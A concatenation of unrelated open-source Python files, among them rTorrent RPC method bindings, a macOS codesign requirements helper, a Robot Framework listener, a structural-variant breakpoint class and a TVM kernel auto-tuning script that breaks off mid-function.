Method(RTorrent, 'get_safe_sync', 'get_safe_sync'),
Method(RTorrent, 'get_bind', 'get_bind'),
Method(RTorrent, 'get_up_total', 'get_up_total'),
Method(RTorrent, 'get_client_version', 'system.client_version'),
Method(RTorrent, 'get_library_version', 'system.library_version'),
Method(RTorrent, 'get_api_version', 'system.api_version',
min_version=(0, 9, 1)
),
Method(RTorrent, "get_system_time", "system.time",
docstring="""Get the current time of the system rTorrent is running on
@return: time (posix)
@rtype: int""",
),
# MODIFIERS
Method(RTorrent, 'set_http_proxy', 'set_http_proxy'),
Method(RTorrent, 'set_max_memory_usage', 'set_max_memory_usage'),
Method(RTorrent, 'set_max_file_size', 'set_max_file_size'),
Method(RTorrent, 'set_bind', 'set_bind',
docstring="""Set address bind
@param arg: ip address
@type arg: str
""",
),
Method(RTorrent, 'set_up_limit', 'set_upload_rate',
docstring="""Set global upload limit (in bytes)
@param arg: speed limit
@type arg: int
""",
),
Method(RTorrent, 'set_port_random', 'set_port_random'),
Method(RTorrent, 'set_connection_leech', 'set_connection_leech'),
Method(RTorrent, 'set_tracker_numwant', 'set_tracker_numwant'),
Method(RTorrent, 'set_max_peers', 'set_max_peers'),
Method(RTorrent, 'set_min_peers', 'set_min_peers'),
Method(RTorrent, 'set_max_uploads_div', 'set_max_uploads_div'),
Method(RTorrent, 'set_max_open_files', 'set_max_open_files'),
Method(RTorrent, 'set_max_downloads_global', 'set_max_downloads_global'),
Method(RTorrent, 'set_session_lock', 'set_session_lock'),
Method(RTorrent, 'set_session', 'set_session'),
Method(RTorrent, 'set_split_suffix', 'set_split_suffix'),
Method(RTorrent, 'set_hash_interval', 'set_hash_interval'),
Method(RTorrent, 'set_handshake_log', 'set_handshake_log'),
Method(RTorrent, 'set_port_range', 'set_port_range'),
Method(RTorrent, 'set_min_peers_seed', 'set_min_peers_seed'),
Method(RTorrent, 'set_scgi_dont_route', 'set_scgi_dont_route'),
Method(RTorrent, 'set_preload_min_size', 'set_preload_min_size'),
Method(RTorrent, 'set_log.tracker', 'set_log.tracker'),
Method(RTorrent, 'set_max_uploads_global', 'set_max_uploads_global'),
Method(RTorrent, 'set_down_limit', 'set_download_rate',
docstring="""Set global download limit (in bytes)
@param arg: speed limit
@type arg: int
""",
),
Method(RTorrent, 'set_preload_required_rate', 'set_preload_required_rate'),
Method(RTorrent, 'set_hash_read_ahead', 'set_hash_read_ahead'),
Method(RTorrent, 'set_max_peers_seed', 'set_max_peers_seed'),
Method(RTorrent, 'set_max_uploads', 'set_max_uploads'),
Method(RTorrent, 'set_session_on_completion', 'set_session_on_completion'),
Method(RTorrent, 'set_max_open_http', 'set_max_open_http'),
Method(RTorrent, 'set_directory', 'set_directory'),
Method(RTorrent, 'set_http_cacert', 'set_http_cacert'),
Method(RTorrent, 'set_dht_throttle', 'set_dht_throttle'),
Method(RTorrent, 'set_hash_max_tries', 'set_hash_max_tries'),
Method(RTorrent, 'set_proxy_address', 'set_proxy_address'),
Method(RTorrent, 'set_split_file_size', 'set_split_file_size'),
Method(RTorrent, 'set_receive_buffer_size', 'set_receive_buffer_size'),
Method(RTorrent, 'set_use_udp_trackers', 'set_use_udp_trackers'),
Method(RTorrent, 'set_connection_seed', 'set_connection_seed'),
Method(RTorrent, 'set_xmlrpc_size_limit', 'set_xmlrpc_size_limit'),
Method(RTorrent, 'set_xmlrpc_dialect', 'set_xmlrpc_dialect'),
Method(RTorrent, 'set_safe_sync', 'set_safe_sync'),
Method(RTorrent, 'set_http_capath', 'set_http_capath'),
Method(RTorrent, 'set_send_buffer_size', 'set_send_buffer_size'),
Method(RTorrent, 'set_max_downloads_div', 'set_max_downloads_div'),
Method(RTorrent, 'set_name', 'set_name'),
Method(RTorrent, 'set_port_open', 'set_port_open'),
Method(RTorrent, 'set_timeout_sync', 'set_timeout_sync'),
Method(RTorrent, 'set_peer_exchange', 'set_peer_exchange'),
Method(RTorrent, 'set_ip', 'set_ip',
docstring="""Set IP
@param arg: ip address
@type arg: str
""",
),
Method(RTorrent, 'set_timeout_safe_sync', 'set_timeout_safe_sync'),
Method(RTorrent, 'set_preload_type', 'set_preload_type'),
Method(RTorrent, 'set_check_hash', 'set_check_hash',
docstring="""Enable/Disable hash checking on finished torrents
@param arg: True to enable, False to disable
@type arg: bool
""",
boolean=True,
),
]
_all_methods_list = [methods,
rtorrent.file.methods,
rtorrent.torrent.methods,
rtorrent.tracker.methods,
rtorrent.peer.methods,
]
class_methods_pair = {
RTorrent: methods,
rtorrent.file.File: rtorrent.file.methods,
rtorrent.torrent.Torrent: rtorrent.torrent.methods,
rtorrent.tracker.Tracker: rtorrent.tracker.methods,
rtorrent.peer.Peer: rtorrent.peer.methods,
}
for c in class_methods_pair.keys():
rtorrent.rpc._build_rpc_methods(c, class_methods_pair[c])
_build_class_methods(c)
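# Example usage (a minimal sketch; the URI, credentials and torrent URL below are
# placeholders, not values taken from this project):
if __name__ == '__main__':
    rt = RTorrent('http://localhost/RPC2', username='user', password='secret')
    for t in rt.get_torrents():
        print(t.info_hash)
    # load_torrent() verifies the add and returns a Torrent instance, while
    # load_torrent_simple() is faster but performs no verification and returns None:
    # rt.load_torrent_simple('http://example.com/example.torrent', 'url', start=True)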
|
src/tcclib/codesign.py
|
CollectiveDS/tccprofile
| 244 |
88699
|
<gh_stars>100-1000
"""Codesign."""
import re
import subprocess
from os import remove
from pathlib import Path, PurePath
from tempfile import gettempdir
def _xxd(blob):
"""XXD"""
result = None
# Note, this requires input passed in via 'stdin', so include 'stdin' for piping input.
_cmd = ['/usr/bin/xxd', '-r', '-p']
_p = subprocess.Popen(_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_p.stdin.write(blob)
_r, _e = _p.communicate()
if _p.returncode == 0 and _r:
result = _r
elif _p.returncode != 0 and _e:
result = _e
return result
def csreq(blob):
"""csreq"""
result = None
# Note, this requires input passed in via 'stdin', so include 'stdin' for piping input.
_cmd = ['/usr/bin/csreq', '-vvv', '-r', '-', '-t']
_p = subprocess.Popen(_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_p.stdin.write(_xxd(blob))
_r, _e = _p.communicate()
if _r and isinstance(_r, bytes):
_r = _r.decode('utf-8').strip()
if _e and isinstance(_e, bytes):
_e = _e.decode('utf-8').strip()
if _p.returncode == 0 and _r:
result = _r
elif _p.returncode != 0 and _e:
result = _e
return result
def detached_signature(path):
"""Codesign using a detached signature."""
result = None
_tmp = gettempdir()
_path_sig = '{}.sig'.format(PurePath(path).name)
_sig_file = Path(_tmp) / _path_sig
_cmd = ['/usr/bin/codesign', '--detached', str(_sig_file), '-s', '-', path]
_p = subprocess.Popen(_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_r, _e = _p.communicate()
if _r and isinstance(_r, bytes):
_r = _r.decode('utf-8')
if _e and isinstance(_e, bytes):
_e = _e.decode('utf-8')
if _p.returncode == 0:
result = requirements(path, detached_sig=_sig_file)
if result:
remove(str(_sig_file))
return result
def requirements(path, detached_sig=None, apple_event=False):
"""Codesign."""
result = dict()
# Change the dict keys if this is an AppleEvent style requirement
if apple_event:
_id_key = 'apple_events_identifier'
_id_type_key = 'apple_events_identifier_type'
_csreq_key = 'apple_events_csreq'
else:
_id_key = 'identifier'
_id_type_key = 'identifier_type'
_csreq_key = 'csreq'
# Lines with useful output start with these strings
_dsgn_prefix = 'designated => '
_idnt_prefix = 'Identifier='
# Bundle ID regex test string
_bnid_regex = re.compile(r'^\w+\.')
if not detached_sig:
_cmd = ['/usr/bin/codesign', '-v', '-dr', '-', path]
elif detached_sig:
_cmd = ['/usr/bin/codesign', '-vvv', '-d', '-r', '-', '--detached', detached_sig, path]
_p = subprocess.Popen(_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_r, _e = _p.communicate()
if _r and isinstance(_r, bytes):
_r = _r.decode('utf-8')
if _e and isinstance(_e, bytes):
_e = _e.decode('utf-8')
if _p.returncode == 0:
# Extract the code signature from the result. Handle circumstances
# where the output may not explicitly start with 'designated => '
# and where the code signature is split across multiple lines.
for _line in _r.splitlines():
if _dsgn_prefix in _line:
_res = _line.partition(_dsgn_prefix)
_res = _res[_res.index(_dsgn_prefix) + 1:][0]
result[_csreq_key] = _res
for _line in _e.splitlines():
if _line.startswith(_idnt_prefix):
if _idnt_prefix in _line:
result[_id_key] = _line.replace(_idnt_prefix, '')
result[_id_type_key] = 'bundleID'
                    # Test that the bundle ID matches the expected
                    # 'org.example.foo' style. This is not a terribly
                    # strict test; it is aimed at avoiding cases where,
                    # for example, the 'python3' binary deep inside a
                    # framework has an identifier value of just 'python3'.
if not re.match(_bnid_regex, result[_id_key]):
result[_id_key] = path
result[_id_type_key] = 'path'
elif _p.returncode == 1 and 'not signed' in _e:
result[_csreq_key] = None
result[_id_key] = None
result[_id_type_key] = None
result['is_signed'] = result.get('csreq', None) is not None
return result
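# Example usage (a minimal sketch; assumes macOS with /usr/bin/codesign present and
# that the application path below exists on the machine):
if __name__ == '__main__':
    info = requirements('/Applications/Safari.app')
    print(info.get('identifier'), info.get('identifier_type'), info.get('is_signed'))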
|
tdb/interface.py
|
KEVINYZY/tdb
| 1,527 |
88704
|
"""
Top-level interface methods so the user doesn't need to construct
a DebugSession directly.
"""
import debug_session
# default session
_dbsession=None
def debug(evals,feed_dict=None,breakpoints=None,break_immediately=False,session=None):
"""
spawns a new debug session
"""
global _dbsession
_dbsession=debug_session.DebugSession(session)
return _dbsession.run(evals,feed_dict,breakpoints,break_immediately)
def s():
"""
step to the next node in the execution order
"""
global _dbsession
return _dbsession.s()
def c():
"""
continue
"""
global _dbsession
return _dbsession.c()
def get_exe_queue():
global _dbsession
return _dbsession.get_exe_queue()
def get_value(node):
global _dbsession
return _dbsession.get_value(node)
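# Example usage (a minimal sketch; assumes a TensorFlow graph with a node `loss` and a
# placeholder `x` already built by the caller, and that debug() returns a
# (status, result) pair as used below):
#   import tdb
#   status, result = tdb.debug([loss], feed_dict={x: batch}, break_immediately=True)
#   status, result = tdb.s()   # step to the next node in the execution order
#   status, result = tdb.c()   # continue to the next breakpoint or to completion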
|
supersuit/__init__.py
|
PettingZoo-Team/SuperSu
| 237 |
88742
|
from .generic_wrappers import * # NOQA
from .lambda_wrappers import action_lambda_v1, observation_lambda_v0, reward_lambda_v0 # NOQA
from .multiagent_wrappers import agent_indicator_v0, black_death_v2, \
pad_action_space_v0, pad_observations_v0 # NOQA
from supersuit.generic_wrappers import frame_skip_v0, color_reduction_v0, resize_v0, dtype_v0, \
flatten_v0, reshape_v0, normalize_obs_v0, clip_actions_v0, clip_reward_v0, \
delay_observations_v0, frame_stack_v1, max_observation_v0, \
sticky_actions_v0 # NOQA
from .vector.vector_constructors import gym_vec_env_v0, stable_baselines_vec_env_v0, \
stable_baselines3_vec_env_v0, concat_vec_envs_v1, pettingzoo_env_to_vec_env_v1 # NOQA
from .aec_vector import vectorize_aec_env_v0 # NOQA
class DeprecatedWrapper(ImportError):
pass
def __getattr__(wrapper_name):
"""
    Gives an error that looks like this when trying to import an old version of a wrapper:
File "./supersuit/__init__.py", line 38, in __getattr__
raise DeprecatedWrapper(f"{base}{version_num} is now deprecated, use {base}{act_version_num} instead")
supersuit.DeprecatedWrapper: concat_vec_envs_v0 is now deprecated, use concat_vec_envs_v1 instead
"""
start_v = wrapper_name.rfind("_v") + 2
version = wrapper_name[start_v:]
base = wrapper_name[:start_v]
try:
version_num = int(version)
is_valid_version = True
except ValueError:
is_valid_version = False
globs = globals()
if is_valid_version:
for act_version_num in range(1000):
if f"{base}{act_version_num}" in globs:
if version_num < act_version_num:
raise DeprecatedWrapper(f"{base}{version_num} is now deprecated, use {base}{act_version_num} instead")
raise ImportError(f"cannot import name '{wrapper_name}' from 'supersuit'")
__version__ = "3.3.2"
|
galaxy/main/models/task.py
|
bmclaughlin/galaxy
| 904 |
88760
|
<reponame>bmclaughlin/galaxy<filename>galaxy/main/models/task.py
# (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.
import rq.job
from django.db import models
from django.contrib.postgres import fields as psql_fields
from pulpcore.app import models as pulp_models
class Task(models.Model):
"""
    Generic table for handling tasks.
:var params: Task parameters json dictionary
:var result: Task result json dictionary
"""
params = psql_fields.JSONField(null=True)
result = psql_fields.JSONField(null=True)
pulp_task = models.OneToOneField(
pulp_models.Task, on_delete=models.CASCADE,
related_name='galaxy_task'
)
@property
def job_id(self):
return self.pulp_task.job_id
@property
def state(self):
return self.pulp_task.state
@property
def started_at(self):
return self.pulp_task.started_at
@property
def finished_at(self):
return self.pulp_task.finished_at
@property
def warnings(self):
return self.pulp_task.non_fatal_errors
@property
def error(self):
return self.pulp_task.error
@classmethod
def current(cls):
job = rq.job.get_current_job()
if job is None:
raise RuntimeError(
'This function is called outside of task context.'
)
return cls.objects.get(pulp_task__job_id=job.id)
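# Example usage inside an RQ task (a minimal sketch; the task body and field values
# are hypothetical):
#   def import_repository(repository_id):
#       task = Task.current()          # resolved via the current rq job id
#       task.result = {'imported': repository_id}
#       task.save()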
|
tributary/__init__.py
|
Ferev/tributary
| 357 |
88765
|
<filename>tributary/__init__.py
from ._version import __version__ # noqa: F401, E402
from .lazy import LazyGraph, LazyNode, node # noqa: F401, E402
from .streaming import * # noqa: F401, F403, E402
from .utils import LazyToStreaming # noqa: F401, E402
|
atest/testresources/listeners/ListenImports.py
|
rdagum/robotframework
| 7,073 |
88774
|
import os
try:
basestring
except NameError:
basestring = str
class ListenImports:
ROBOT_LISTENER_API_VERSION = 2
def __init__(self, imports):
self.imports = open(imports, 'w')
def library_import(self, name, attrs):
self._imported("Library", name, attrs)
def resource_import(self, name, attrs):
self._imported("Resource", name, attrs)
def variables_import(self, name, attrs):
self._imported("Variables", name, attrs)
def _imported(self, import_type, name, attrs):
self.imports.write("Imported %s\n\tname: %s\n" % (import_type, name))
for name in sorted(attrs):
self.imports.write("\t%s: %s\n" % (name, self._pretty(attrs[name])))
def _pretty(self, entry):
if isinstance(entry, list):
return '[%s]' % ', '.join(entry)
if isinstance(entry, basestring) and os.path.isabs(entry):
entry = entry.replace('$py.class', '.py').replace('.pyc', '.py')
tokens = entry.split(os.sep)
index = -1 if tokens[-1] != '__init__.py' else -2
return '//' + '/'.join(tokens[index:])
return entry
def close(self):
self.imports.close()
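# Example usage (a minimal sketch; file names are assumptions): register the listener
# with its output file as the listener argument, e.g.
#   robot --listener ListenImports:imports.txt tests/
# which writes one "Imported Library/Resource/Variables" record per import into imports.txt.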
|
svtools/breakpoint.py
|
NeolithEra/svtools
| 120 |
88778
|
<gh_stars>100-1000
import sys
import l_bp
from exceptions import MissingProbabilitiesException
class BreakpointInterval(object):
'''
Class for storing the range and probability distribution
of a breakpoint
'''
# Constant value for slop padding
SLOP_PROB = 1e-100
def __init__(self, chrom, start, end, p):
self.chrom = chrom
self.start = start
self.end = end
self.p = p
def pad_slop(self, percent_slop, fixed_slop):
'''
Add slop to the interval
'''
slop = int(max(percent_slop * (self.end - self.start + 1), fixed_slop))
self.start -= slop
self.end += slop
self.p = [BreakpointInterval.SLOP_PROB] * slop + self.p + [BreakpointInterval.SLOP_PROB] * slop
self._trim()
self._normalize()
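    # Worked example (illustrative numbers): with percent_slop=0 and fixed_slop=1,
    # an interval with p = [0.5, 0.5] becomes p = [1e-100, 0.5, 0.5, 1e-100], the
    # start/end are each widened by 1, and after normalization the probabilities
    # still sum to 1 with essentially all mass on the original two positions.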
def _trim(self):
'''
Trim any part of range past the beginning of the chromosome
'''
if self.start < 0:
self.p = self.p[-self.start:]
self.start = 0
def _normalize(self):
'''
Normalize interval's probability to sum to 1
'''
sum_p = sum(self.p)
self.p = [float(x)/sum_p for x in self.p]
def common_range(self, other):
return max(self.start, other.start), min(self.end, other.end)
def overlap_prob(self, other, c_start, c_len):
start_off = c_start - self.start
other_start_off = c_start - other.start
ovl = 0
for i in range(c_len):
ovl += min(self.p[i + start_off], other.p[i + other_start_off])
return ovl
class Breakpoint(object):
'''
Class for storing information about Breakpoints for merging
'''
def __init__(self, line, percent_slop=0, fixed_slop=0):
'''
Initialize with slop for probabilities
'''
self.l = line
(self.sv_type,
chr_l,
chr_r,
self.strands,
start_l,
end_l,
start_r,
end_r,
m) = l_bp.split_v(line)
try:
self.left = BreakpointInterval(chr_l, start_l, end_l, self.floats_from_tag(m, 'PRPOS'))
self.right = BreakpointInterval(chr_r, start_r, end_r, self.floats_from_tag(m, 'PREND'))
except RuntimeError as e:
raise MissingProbabilitiesException(str(e))
if ((percent_slop > 0) or (fixed_slop > 0)):
self.left.pad_slop(percent_slop, fixed_slop)
self.right.pad_slop(percent_slop, fixed_slop)
def __str__(self):
'''
Convert back to a string
'''
return '\t'.join([str(x) for x in [self.left.chrom,
self.left.start,
self.left.end,
self.right.chrom,
self.right.start,
self.right.end,
self.sv_type,
self.strands,
self.left.p,
self.right.p]])
def ovl(self, b):
'''
Calculate overlapping cumulative probability value as weight?
0 if not overlapping.
'''
if ((self.left.chrom != b.left.chrom) or
(self.right.chrom != b.right.chrom) or
(self.sv_type != b.sv_type)):
return 0
#get common intervals
c_start_l, c_end_l = self.left.common_range(b.left)
c_start_r, c_end_r = self.right.common_range(b.right)
c_l_len = c_end_l - c_start_l + 1
c_r_len = c_end_r - c_start_r + 1
if (c_l_len < 1) or (c_r_len < 1):
return 0
ovl_l = self.left.overlap_prob(b.left, c_start_l, c_l_len)
ovl_r = self.right.overlap_prob(b.right, c_start_r, c_r_len)
return ovl_l * ovl_r
@staticmethod
def floats_from_tag(info_dict, tag):
if tag in info_dict:
return [float(x) for x in info_dict[tag].split(',')]
else:
raise RuntimeError('Required tag {0} not found.'.format(tag))
|
examples/trials/systems_auto_tuning/opevo/src/compiler_auto_tune_stable.py
|
dutxubo/nni
| 9,680 |
88783
|
#!/usr/bin/env python3
## TODO: optimize c-mcpu metric; early-stop handler; fp16/int8; Kill pyRPC;
import numpy as np
import tvm
import logging
import math
import re
import sys, time, subprocess, os, random, hashlib
from tvm import autotvm
import topi
import json
from topi.util import get_const_tuple
import importlib
from tvm.autotvm.task.dispatcher import ApplyConfig
from tvm.autotvm.task import ConfigEntity
from threading import Timer
backend = os.environ['BACKEND'] if 'BACKEND' in os.environ else 'c-cuda'
def system_lock(key_ids):
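    # Acquire an exclusive device slot by binding a localhost TCP port
    # (9050 + key_id); returns (unlock_fn, key_id) so the caller can release
    # the slot once the measurement is finished.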
import socket, time
occupied_sock = None
while not occupied_sock:
for key_id in key_ids:
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 9050 + key_id))
sock.listen(1)
occupied_sock = (sock, key_id)
break
except:
try:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except:
sock.close()
if occupied_sock:
break
# print('still waiting ..')
time.sleep(0.2)
# print('Using key_id = %d' % occupied_sock[1])
sock = occupied_sock[0]
def unlock_fd():
try:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except:
sock.close()
return unlock_fd, occupied_sock[1]
def show_search_space(config_space, printable):
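    # Convert the autotvm config space into an NNI-style search space dict,
    # dump it as JSON (optionally also to ./search_space.json) and exit.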
search_space = {}
for _, name in enumerate(config_space.space_map):
curr = config_space.space_map[name]
if (curr.__class__ == tvm.autotvm.task.space.SplitSpace):
search_space[name] = {"_type": "factor", "_value": [curr.product, curr.num_output]}
elif (curr.__class__ == tvm.autotvm.task.space.OtherOptionSpace):
search_space[name] = {"_type": "choice", "_value": [x.val for x in curr.entities]}
else:
raise Exception("Cannot recognize search space type: %s" % (config_space.space_map[name].__class__))
json_space = json.dumps(search_space)
print("\n>> Search Space = %s" % json_space)
if printable:
print("\n>> Writing Search Space to './search_space.json'..")
with open("search_space.json", "w") as fp:
fp.write(json_space)
print("\n>> Done")
sys.exit(0)
def get_tuning_parallism():
if 'DEV_NUM' in os.environ:
dev_num = int(os.environ['DEV_NUM'])
else:
if backend in ['c-rocm', '#rocm']:
devices = subprocess.getoutput('/opt/rocm/bin/rocm_agent_enumerator | grep -v gfx000').split()
if not devices:
                raise Exception("No valid rocm device found.")
dev_num = len(devices)
elif backend in ['c-cuda', '#cuda']:
devices = subprocess.getoutput('ls /dev/nvidia[0-9]* 2>/dev/null').split()
if not devices:
                raise Exception("No valid cuda device found.")
dev_num = len(devices)
else:
raise Exception("Unrecognized backend: %s" % backend)
    print(' >> Tuning parallelism = %d' % dev_num)
return dev_num
def local_get_dir_file(rel_file, dir_sid=None):
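    # Build a per-session path under /tmp/tvm_autotvm_engine/<DIR_SID>/,
    # creating the directory if it does not exist yet.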
if not dir_sid:
dir_sid = os.environ['DIR_SID'] if 'DIR_SID' in os.environ else '_'
dir_space = '/tmp/tvm_autotvm_engine'
os.system('mkdir -p "%s/%s"' % (dir_space, dir_sid))
return "%s/%s/%s" % (dir_space, dir_sid, rel_file)
def run_process_with_timeout(args, timeout=None, envs=None):
try:
proc = subprocess.Popen(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, env=envs)
retcode = proc.wait(timeout=timeout)
return retcode == 0
except subprocess.TimeoutExpired:
print('Timed out - killing', proc.pid)
proc.kill()
return False
def parse_launch_bounds(code):
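    # Scan each generated __global__ kernel for "// [thread_extent]" hints and
    # prepend __launch_bounds__(<threads per block>) to the kernel signature.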
func_arr = code.split('extern "C" __global__ ')
for i in range(1, len(func_arr)):
axis_map = dict()
lines = func_arr[i].split('\n')
for it in lines:
if it.startswith(' // [thread_extent] '):
words = it.split(' ')
nthread = int(words[-1])
axis = words[-3]
if axis in axis_map:
if axis_map[axis] != nthread:
assert(False)
else:
axis_map[axis] = nthread
block_bound = axis_map.get('threadIdx.x', 1) * axis_map.get('threadIdx.y', 1) * axis_map.get('threadIdx.z', 1)
func_arr[i] = 'extern "C" __global__ __launch_bounds__(%d) %s' % (block_bound, func_arr[i])
code = ''.join(func_arr)
return code
def translate_code(code):
if backend == 'c-rocm':
code = parse_launch_bounds(code)
code = '#include <hip/hip_runtime.h>\n#include <hip/hip_fp16.h>\n\n'+ code.replace('(__shared__ float4*)', '(float4*)').replace('#include <cuda_fp16.h>', '').replace('typedef unsigned long long uint64_t;', '')
elif backend in ['#cuda', 'c-cuda']:
code = parse_launch_bounds(code)
code = '#include <cuda_runtime.h>\n#include <cuda_fp16.h>\n\n' + code
else:
raise Exception("Unrecognized backend: %s" % backend)
return code
@tvm.register_func
def tvm_callback_backend_proc(code):
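    # TVM-registered build callback: translate the generated source for the
    # selected backend and compile it (lpl for ROCm, nvcc for CUDA) into the
    # binary module data returned to TVM.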
native_code = translate_code(code)
# Compile code
module_data = None
if backend == 'c-rocm':
gcn_arch = subprocess.getoutput('/opt/rocm/bin/rocm_agent_enumerator | sort | uniq | grep -v gfx000 | tail -n 1').strip()
if not gcn_arch:
raise RuntimeError("Compilation error: no valid gcn_arch gpu detected!")
temp_code = local_get_dir_file("my_kernel.cc")
temp_cobj = local_get_dir_file("my_kernel.hsaco")
args = ['/opt/rocm/bin/lpl', temp_code, '-t=' + gcn_arch, '-f="-Wno-ignored-attributes -D__HIP_PLATFORM_HCC__=1"', '-o', temp_cobj]
elif backend in ['#cuda', 'c-cuda']:
temp_code = local_get_dir_file("my_kernel.cu")
temp_cobj = local_get_dir_file("my_kernel.ptx")
args = ['/usr/local/cuda/bin/nvcc', temp_code, '--ptx', '-O3', '-o', temp_cobj]
else:
raise Exception("Unrecognized backend: %s" % backend)
with open(temp_code, 'w') as fp:
fp.write(native_code)
print('[Build @%x]' % os.getpid(), ' '.join(args))
if not run_process_with_timeout(args, 10):
raise Exception("Compilation failed or time limit exceeded")
if module_data is None:
module_data = bytearray(open(temp_cobj, "rb").read())
return module_data
def run_config_entity(params_given, dir_sid, expected_timecost='inf', tune_slot_id=0):
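    # Evaluate one candidate config by re-running this script in a subprocess
    # (the config is passed through the CONFIG env var, the device through
    # CUDA_VISIBLE_DEVICES) and reading the measured time from result.txt;
    # returns inf if the run fails or times out.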
dir_sid = str(dir_sid)
result_file = local_get_dir_file('result.txt', dir_sid)
try:
os.remove(result_file)
except:
pass
config_str = json.dumps(params_given)
envs = os.environ.copy()
envs['CONFIG'] = config_str
envs['DIR_SID'] = dir_sid
envs['CUDA_VISIBLE_DEVICES'] = str(tune_slot_id)
print(" >> Try param_entity on sid = %s: config = %s, slot_id = %d" % (dir_sid, config_str, tune_slot_id))
try:
assert(True == run_process_with_timeout(["python%d" % sys.version_info.major] + sys.argv, envs=envs))
result = float(open(result_file, 'r').read().strip())
except:
result = float('inf')
print(" >> Try param_entity on sid = %s: result = `%.6f`" % (dir_sid, result))
return result
def compute_gflops(flop, t):
return flop / (t * 1e3) / 1e6
def search_op_config(code_only=False):
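    # Main entry point: depending on the environment this evaluates a single
    # CONFIG, serves one NNI trial, runs an XGBTuner search for STEP trials, or
    # falls back to the default schedule; it then lowers the op, checks thread
    # and shared-memory limits, builds the kernel and times it on the device.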
tvm_target = 'cuda'
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
default_tune_op = importlib.import_module('templates.' + (os.environ['OP']))
print(' >> Backend = %s, Python PID = %s, Task = %s;' % (backend, os.getpid(), default_tune_op.__name__))
task = autotvm.task.create(default_tune_op.get_template_op, args=(), target=tvm_target)
op_attributes = default_tune_op.op_attributes
op_summary = '_'.join([k + str(op_attributes[k]) for k in op_attributes])
def json_to_config(json_dict):
config = ConfigEntity.from_json_dict({"i": -1, "t": "", "c": None, "e": json_dict})
return config
def config_to_json(config):
jobj = config.to_json_dict()['e']
json_dict = dict()
for i in range(len(jobj)):
assert(jobj[i][1] in ['sp', 'ot'])
json_dict[jobj[i][0]] = jobj[i][2]
return json_dict
num_trials = int(os.environ['STEP']) if 'STEP' in os.environ else 0
if 'CONFIG' in os.environ:
params_given = json.loads(os.environ['CONFIG'])
print("====>> [Current Config Option]", os.environ['CONFIG'])
trial_config = []
for key in params_given:
trial_config.append([key, "sp" if type(params_given[key]) is list else "ot", params_given[key]])
best_config = json_to_config(trial_config)
elif 'NNI_TRIAL_JOB_ID' in os.environ:
show_search_space(task.config_space, os.environ['NNI_TRIAL_JOB_ID'] == '@')
import nni
params_given = nni.get_next_parameter()
        if params_given is None:
            raise RuntimeError("Failed to get the next parameter from NNI.")
local_dir_id = os.environ['NNI_TRIAL_JOB_ID']
t = run_config_entity(params_given, local_dir_id)
gflops = compute_gflops(task.flop, t)
print('[TVM-engine] Final entity result is: %g' % gflops)
try:
nni.report_final_result(gflops)
except:
print('[TVM-engine] (not reporting final result to NNI.)')
exit(0)
elif num_trials > 0:
n_parallel = 16 if 'BATCH' not in os.environ else int(os.environ['BATCH'])
measure_option = autotvm.measure_option(
builder=autotvm.LocalBuilder(n_parallel=n_parallel),
runner=autotvm.LocalRunner(repeat=3, min_repeat_ms=100, timeout=4)
)
# if DO_TUNING:
tuner = autotvm.tuner.XGBTuner(task, num_threads=8)
from concurrent.futures import ThreadPoolExecutor
thread_pool = ThreadPoolExecutor(max_workers=n_parallel)
dev_num = get_tuning_parallism()
def parse_configs(task, configs):
results = []
futures = []
expected_timecost = 'inf'
for i in range(len(configs)):
futures.append(thread_pool.submit(run_config_entity, config_to_json(configs[i]), i, expected_timecost, i % dev_num))
for i in range(len(configs)):
t = futures[i].result()
if t < tuner.task.best_config[0]:
tuner.task.best_config = (t, configs[i])
results.append(autotvm.measure.MeasureResult(costs=(t,), error_no=0, all_cost=i, timestamp=time.time()))
return results
tuner.task.best_config = (float('inf'), None)
tuner.parse_configs = parse_configs
tuner.tune(n_trial=num_trials, measure_option=measure_option, callbacks=[])
assert(not math.isinf(tuner.task.best_config[0]))
best_config = tuner.task.best_config[1]
print('\n[Best Config]', json.dumps(config_to_json(best_config)))
else:
best_config = task.config_space
with ApplyConfig(best_config):
with tvm.target.create(tvm_target):
s, arg_bufs = default_tune_op.get_template_op()
lower_source = str(tvm.lower(s, arg_bufs, simple_mode=True))
# Verify Source Code
assert(len(('\n' + lower_source).split('\nproduce ')) == 2)
lower_file = local_get_dir_file('my_kernel.lower')
with open(lower_file, 'w') as fp:
fp.write(lower_source)
max_threads_per_block = tvm.ndarray.gpu(0).max_threads_per_block
max_shared_memory_per_block = tvm.ndarray.gpu(0).max_shared_memory_per_block
thread_extents = subprocess.getoutput("cat '%s' | grep '^ *// attr.*iter_var.*thread_extent'" % (lower_file)).split('\n')
reserved_axes = dict({'threadIdx.x': None, 'threadIdx.y': None, 'threadIdx.z': None, 'blockIdx.x': None, 'blockIdx.y': None, 'blockIdx.z': None})
for line in thread_extents:
thread_name = line.split('[iter_var(')[-1].split(',')[0]
if thread_name in reserved_axes:
thread_val = int(line.split('thread_extent = ')[-1])
if reserved_axes[thread_name] is not None:
if reserved_axes[thread_name] != thread_val:
assert(False)
else:
reserved_axes[thread_name] = thread_val
else:
raise Exception("Invalid thread_axis name: %s" % thread_name)
num_threads = 1
for thread_name in ['threadIdx.x', 'threadIdx.y', 'threadIdx.z']:
if reserved_axes[thread_name] is not None:
num_threads *= reserved_axes[thread_name]
if num_threads > max_threads_per_block:
raise Exception("Invalid kernel code: using num_threads %d > max_threads_per_block %d" % (num_threads, max_threads_per_block))
